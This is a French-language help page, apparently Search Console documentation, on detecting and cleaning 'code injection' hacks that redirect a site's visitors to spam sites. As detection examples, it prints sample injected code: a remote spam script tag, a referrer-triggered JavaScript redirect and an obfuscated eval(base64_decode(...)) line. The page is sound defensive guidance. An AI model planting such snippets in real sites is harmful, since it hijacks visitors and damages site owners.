Type de piratage : injection de code

Quelle est la signification des pages signalées par le type de site piraté "Injection de code" dans Search Console ?

Cela signifie qu'un pirate informatique a modifié votre site afin que les visiteurs soient redirigés vers son site contenant du spam. Parfois, seuls certains internautes sont redirigés en fonction de leur emplacement, de leur site de référence ou du périphérique qu'ils utilisent (par exemple, un téléphone mobile). Le pirate informatique peut avoir injecté le code malveillant directement dans les fichiers HTML de votre site (par exemple, une redirection JavaScript) ou dans les fichiers qui génèrent le contenu de votre site (par exemple, les fichiers PHP). Le pirate informatique peut également rediriger les visiteurs en modifiant le ou les fichier(s) de configuration de votre serveur. Les fichiers de configuration de serveur permettent en général à l'administrateur du site de spécifier les URL de redirection pour des pages ou des répertoires spécifiques d'un site Web. Par exemple, sur les serveurs Apache, il s'agit des fichiers .htaccess et httpd.conf. Si vous ne savez pas comment examiner les fichiers de configuration de votre serveur, consultez l'étape 2 : Mettre en place une équipe d'assistance de l'aide au processus de récupération des sites piratés.

Pour en savoir plus sur les sites piratés par du spam, consultez l'étape 5 : Évaluer les dommages (spam).

Comment puis-je examiner l'URL de redirection présente sur une telle page ?

Tout d'abord, vous ne devez pas utiliser de navigateur pour consulter les pages piratées de votre site. En effet, les pirates informatiques configurent souvent des pages pour que la redirection se fasse en fonction des caractéristiques de l'internaute telles que :

  • Son emplacement, souvent déterminé à l'aide de l'adresse IP
  • Son URL de provenance, telle qu'une page de résultats de recherche
  • Son user-agent, tel qu'un navigateur mobile ou moins sécurisé

Envisagez plutôt de confirmer le comportement à l'aide de la technique suivante :

  • Use cURL or Wget to fetch a page:
    These freely available tools let you view the source of the page as seen by a search engine, and have the flexibility to include referrer or user-agent information. By serving spammy content only to users with specific user-agents or referrers, the hacker can target more "real people" and can better avoid detection from site owners and anti-hacking algorithms used by search engines. (Your site will need to be online to use these tools.) For example:
    $curl -v --referer "http://www.google.com/search?q=page" --user-agent "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30" http://www.example.com/page.html
  • L'exploration d'une page avec un fichier de configuration de serveur piraté peut renvoyer l'en-tête suivant :

    …
    < HTTP/1.1 301 Moved Permanently
    < Date: Sun, 24 Feb 2013 21:06:45 GMT
    < Server: Apache
    < Location: http://<spam-site>/index.html
    < Content-Length: 253
    …
    

    Ou, en inspectant le contenu de la page renvoyée, vous pouvez voir du code injecté tel que celui-ci :

    • langage JavaScript ou autre langage de script qui appelle et exécute des scripts provenant d'un site contenant du spam : <script type='text/javascript' src='http://spam-site/js/x55.js'></script>
    • script qui redirige le navigateur vers un site contenant du spam :
      
      <script>
      if (document.referrer.match(/google\.com/)) { window.location("http://spam-site/"); } </script>
    • du code de type spam dissimulé pour ne pas être détecté :
      eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

    Examinez tous les codes potentiellement suspects présents sur le site. Il peut être utile de rechercher des mots tels que "script" pour trouver du code JavaScript. D'autres mots-clés utiles sont "eval", "unescape", etc.

    Comment puis-je supprimer le type de piratage "Injection de code" de mon site ?

    Lorsque vous êtes prêt à nettoyer votre site (étape 7 de l'aide au processus de récupération des sites piratés), vous pouvez soit remplacer les répertoires affectés par la dernière sauvegarde non infectée, soit supprimer les injections de code de chaque page ainsi que toutes les fonctions et tous les fichiers de script correspondants. Si vous avez modifié des fichiers de configuration du serveur, vous devrez peut-être redémarrer votre serveur Web pour que les modifications prennent effet.

    Sachez que si supprimer le type de piratage "Injection de code" permet de récupérer un site piraté, cela ne permet pas de corriger la faille de sécurité qui a initialement permis au pirate informatique d'attaquer votre site. Si vous n'en corrigez pas la cause principale, votre site pourra à nouveau faire l'objet d'un piratage. Il peut être utile, par exemple, de mettre à jour les logiciels qui s'exécutent sur votre site, tels qu'un ancien WordPress. Pour en savoir plus sur le nettoyage de l'ensemble de votre site, et non uniquement sur ce type de piratage, consultez la section "Évaluation des dommages dans le système de fichiers" de l'étape 5: Évaluer les dommages (spam) de l'aide au processus de récupération des sites piratés.

    Ces informations vous-ont elles été utiles ?
    Comment pouvons-nous l'améliorer ?